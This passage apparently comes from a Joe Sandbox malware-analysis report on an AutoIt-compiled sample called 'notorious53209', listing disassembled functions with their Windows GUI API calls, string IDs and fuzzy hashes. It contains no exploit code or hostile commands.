                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorE349InvalidateMoveRect
                                                  • String ID: 0
                                                  • API String ID: 2631842597-4108050209
                                                  • Opcode ID: 6499f40187223be9794e135255521587712eec4ea5448c57733b260af086fb69
                                                  • Instruction ID: 6a55959ed9f830acb15a4fe41b90247174fac8b3b47dbaa6cf021b07b75591aa
                                                  • Opcode Fuzzy Hash: 6499f40187223be9794e135255521587712eec4ea5448c57733b260af086fb69
                                                  • Instruction Fuzzy Hash: AD12AC70604205EFDB20DF28C984BA9BBE2FF05314F5445B9F896DB662CB31E842DB91
                                                  Function 0090AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 0090AB99
                                                  • SetTextColor.GDI32(?,?), ref: 0090AB9D
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                                  • GetSysColor.USER32(0000000F), ref: 0090ABBE
                                                  • CreateSolidBrush.GDI32(?), ref: 0090ABC3
                                                  • GetSysColor.USER32(00000011), ref: 0090ABDB
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                                  • SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                                  • SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                                  • SelectObject.GDI32(?,?), ref: 0090AC10
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090ACA7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090ACCE
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0090ACEC
                                                  • DrawFocusRect.USER32(?,?), ref: 0090ACF7
                                                  • GetSysColor.USER32(00000011), ref: 0090AD05
                                                  • SetTextColor.GDI32(?,00000000), ref: 0090AD0D
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AD21
                                                  • SelectObject.GDI32(?,0090A869), ref: 0090AD38
                                                  • DeleteObject.GDI32(?), ref: 0090AD43
                                                  • SelectObject.GDI32(?,?), ref: 0090AD49
                                                  • DeleteObject.GDI32(?), ref: 0090AD4E
                                                  • SetTextColor.GDI32(?,?), ref: 0090AD54
                                                  • SetBkColor.GDI32(?,?), ref: 0090AD5E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: ad5e71a83c847002f6eeca5d1371da1cd293fd7fc84eb6af71be179609b687d0
                                                  • Instruction ID: 02a87acc70f62f18426c1a9d3d9d880ca111ebee45f6c46f48de80e0c9cd9a0f
                                                  • Opcode Fuzzy Hash: ad5e71a83c847002f6eeca5d1371da1cd293fd7fc84eb6af71be179609b687d0
                                                  • Instruction Fuzzy Hash: E3615D71904218EFDF219FA8DC48EAE7BB9EF08320F114525F915AB2E1D6759A40EB90
                                                  Function 00908C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908D34
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908D45
                                                  • CharNextW.USER32(0000014E), ref: 00908D74
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908DB5
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908DCB
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908DDC
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908DF9
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00908E45
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908E5B
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908E8C
                                                  • _memset.LIBCMT ref: 00908EB1
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908EFA
                                                  • _memset.LIBCMT ref: 00908F59
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908F83
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908FDB
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00909088
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009090AA
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009090F4
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00909121
                                                  • DrawMenuBar.USER32(?), ref: 00909130
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00909158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: afb4a7e2c889ee7c743a70c7f60fa2cd9b3b8800a7a2dbb3e42644baf2d43b2d
                                                  • Instruction ID: b2e9ae9ef2b3d0023e8aca059dc1e97f2696649d9b3f1b09a43617cb080eeded
                                                  • Opcode Fuzzy Hash: afb4a7e2c889ee7c743a70c7f60fa2cd9b3b8800a7a2dbb3e42644baf2d43b2d
                                                  • Instruction Fuzzy Hash: E0E1AD71A04219AEDF209F64CC88EEF7BB9FF05710F008259F955AA2D1DB748A81DF61
                                                  Function 00904B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00904C51
                                                  • GetDesktopWindow.USER32 ref: 00904C66
                                                  • GetWindowRect.USER32(00000000), ref: 00904C6D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00904CCF
                                                  • DestroyWindow.USER32(?), ref: 00904CFB
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904D24
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904D42
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904D68
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00904D7D
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904D90
                                                  • IsWindowVisible.USER32(?), ref: 00904DB0
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904DCB
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904DDF
                                                  • GetWindowRect.USER32(?,?), ref: 00904DF7
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00904E1D
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00904E37
                                                  • CopyRect.USER32(?,?), ref: 00904E4E
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00904EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                                                  • Instruction ID: ecc72c6dcd6cf85c512f67002a89b7531200fd950c0c56eb3c34ed51c2b5c3d2
                                                  • Opcode Fuzzy Hash: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                                                  • Instruction Fuzzy Hash: 0BB18CB1608341AFDB14DF28C944B6ABBE5FF84714F00891CF6999B2A1DB71ED05CB92
                                                  Function 008827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 008828C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 008828F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 0088291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                                                  • GetStockObject.GDI32(00000011), ref: 008829CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 269ef0adc8a7363fd3591c738f13bf6885c49e08567d72d8847cbf9f91bfed9f
                                                  • Instruction ID: 61d630acc803f640ddead317c8e8aa47f3b3ad750edc068a9a3079d88303e833
                                                  • Opcode Fuzzy Hash: 269ef0adc8a7363fd3591c738f13bf6885c49e08567d72d8847cbf9f91bfed9f
                                                  • Instruction Fuzzy Hash: 8AB18D71A0420AAFDB24EFA8DC55BEE7BB4FB08714F108129FA15E7390DB70A940DB51
                                                  Function 008E46D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 3576275495-1459072770
                                                  • Opcode ID: 454b9a3d37549a9f68f7d77a8a71e01777b73a298989aa6b3094debe45584715
                                                  • Instruction ID: d9ddd519973ca63fa15d142bbea13dca6fa9424bf52af579b8cda6cf0259f6c5
                                                  • Opcode Fuzzy Hash: 454b9a3d37549a9f68f7d77a8a71e01777b73a298989aa6b3094debe45584715
                                                  • Instruction Fuzzy Hash: D9411971604254BEFB20A7698C47EBF77ACFF43710F040069F908E6582EF75DA1196A6
                                                  Function 00904069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009040F6
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009041B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: 58db4be52db60ef5d8c38005e92665061ec85d598dad75034580de7fd82ed163
                                                  • Instruction ID: d549074ab95933950d000a9aff0f9a340af5aa2d36d0cb01fe9245d51c6fe7cc
                                                  • Opcode Fuzzy Hash: 58db4be52db60ef5d8c38005e92665061ec85d598dad75034580de7fd82ed163
                                                  • Instruction Fuzzy Hash: 37A18DB12143019FCB14EF28C992A6AB3E5FF84314F144969F9A69B7D2DB34EC05CB42
                                                  Function 008F52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 008F5309
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5314
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 008F531F
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 008F532A
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5335
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 008F5340
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 008F534B
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 008F5356
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 008F5361
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 008F536C
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 008F5377
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 008F5382
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 008F538D
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 008F5398
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 008F53A3
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 008F53AE
                                                  • GetCursorInfo.USER32(?), ref: 008F53BE
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 008F53E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                                                  • Instruction ID: 6a7ece479e581dd502185d09175c62c427cc97311b1547367873f51e6ba31595
                                                  • Opcode Fuzzy Hash: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                                                  • Instruction Fuzzy Hash: 97417670E043196ADB109FBA8C49C6EFFF8FF51750B10452FE609E7290DAB855008E65
                                                  Function 008DAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DAAA5
                                                  • __swprintf.LIBCMT ref: 008DAB46
                                                  • _wcscmp.LIBCMT ref: 008DAB59
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DABAE
                                                  • _wcscmp.LIBCMT ref: 008DABEA
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 008DAC21
                                                  • GetDlgCtrlID.USER32(?), ref: 008DAC73
                                                  • GetWindowRect.USER32(?,?), ref: 008DACA9
                                                  • GetParent.USER32(?), ref: 008DACC7
                                                  • ScreenToClient.USER32(00000000), ref: 008DACCE
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DAD48
                                                  • _wcscmp.LIBCMT ref: 008DAD5C
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 008DAD82
                                                  • _wcscmp.LIBCMT ref: 008DAD96
                                                    • Part of subcall function 008A386C: _iswctype.LIBCMT ref: 008A3874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 56c6ad26884181dcda251ae0b1063118d7851d3825c99608ff527710c718da37
                                                  • Instruction ID: 9ef6675515b9d8fdc322a155b7a55c0cf451d7ceaf7be71554cb61821c79a467
                                                  • Opcode Fuzzy Hash: 56c6ad26884181dcda251ae0b1063118d7851d3825c99608ff527710c718da37
                                                  • Instruction Fuzzy Hash: C3A1D671204706AFDB18DF24C884FAAB7E9FF04355F20472AF999D2651DB30EA45CB92
                                                  Function 008DB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 008DB3DB
                                                  • _wcscmp.LIBCMT ref: 008DB3EC
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DB414
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 008DB431
                                                  • _wcscmp.LIBCMT ref: 008DB44F
                                                  • _wcsstr.LIBCMT ref: 008DB460
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB498
                                                  • _wcscmp.LIBCMT ref: 008DB4A8
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB4CF
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB518
                                                  • _wcscmp.LIBCMT ref: 008DB528
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB550
                                                  • GetWindowRect.USER32(00000004,?), ref: 008DB5B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: da794da71cef8bf1607a550c38522b79a15a5d27b2aa0bddd4a1457ee8a00e16
                                                  • Instruction ID: ee4b2954f48f161b645e2de6d9be8a9b132019ce14e717b729c84051d4e09489
                                                  • Opcode Fuzzy Hash: da794da71cef8bf1607a550c38522b79a15a5d27b2aa0bddd4a1457ee8a00e16
                                                  • Instruction Fuzzy Hash: D181AD71008209DBDB14DF14D885FAA77E8FF54714F08866AFD85CA292DB30DE45CB62
                                                  Function 008DB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 9b56e07fab8e711d429f60e62181863e90be01b60b9c6f969f8bf44c87fc24e3
                                                  • Instruction ID: d43fd4d000b27aeea4a115d9477fc9671c0b5b788c795ac01f706672b71fb598
